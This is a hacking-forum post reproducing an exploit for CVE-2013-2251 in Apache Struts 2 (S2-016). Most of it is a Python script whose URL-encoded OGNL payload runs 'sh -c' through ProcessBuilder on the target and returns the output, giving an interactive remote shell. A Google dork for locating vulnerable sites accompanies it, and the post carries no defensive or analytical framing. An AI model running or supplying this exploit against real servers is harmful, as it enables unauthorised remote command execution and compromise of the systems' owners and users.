Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution

 Share


Recommended Posts

# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
# Google Dork: ext:action | filetype:action
# Date: 2020/09/09
# Exploit Author: Jonatas Fil
# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
# Version: <= 2.3.15
# Tested on: Linux
# CVE : CVE-2013-2251

#!/usr/bin/python
#
# coding=utf-8
#
# Struts 2 DefaultActionMapper Exploit [S2-016]
# Interactive Shell for CVE-2013-2251
#
# The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with
# "action:" or "redirect:", followed by a desired navigational target
expression. This mechanism was intended to help with
# attaching navigational information to buttons within forms.
#
# https://struts.apache.org/docs/s2-016.html
# Jonatas Fil (@exploitation)

import requests
import sys
import readline


# Disable SSL
requests.packages.urllib3.disable_warnings()

# ShellEvil
if len(sys.argv) == 2:
    target = sys.argv[1] # Payload
    first = target +
"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','"
    second =
"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
    loop = 1
    while loop == 1:
        cmd = raw_input("$ ")
        while cmd.strip() == '':
            cmd = raw_input("$ ")
        if cmd.strip() == '\q':
            print("Exiting...")
            sys.exit()
        try:
            headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"}
            pwn=requests.get(first+cmd+second,headers =
headers,verify=False) # Disable SSL
            if pwn.status_code == 200:
                print pwn.content # 1337
            else:
                print("Not Vuln !")
                sys.exit()
        except Exception,e:
            print e
            print("Exiting...")
            sys.exit()

else: # BANNER
    print('''
 __ _          _ _   __       _ _
/ _\ |__   ___| | | /__\_   _(_) |
\ \| '_ \ / _ \ | |/_\ \ \ / / | |
_\ \ | | |  __/ | //__  \ V /| | |
\__/_| |_|\___|_|_\__/   \_/ |_|_|

          by Jonatas Fil [@explotation]
''')
    print("======================================================")
    print("#    Struts 2 DefaultActionMapper Exploit [S2-016]   #")
    print("# USO: python struts.py http://site.com:8080/xxx.action #")
    print("======================================================")
    print("bye")
    sys.exit()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...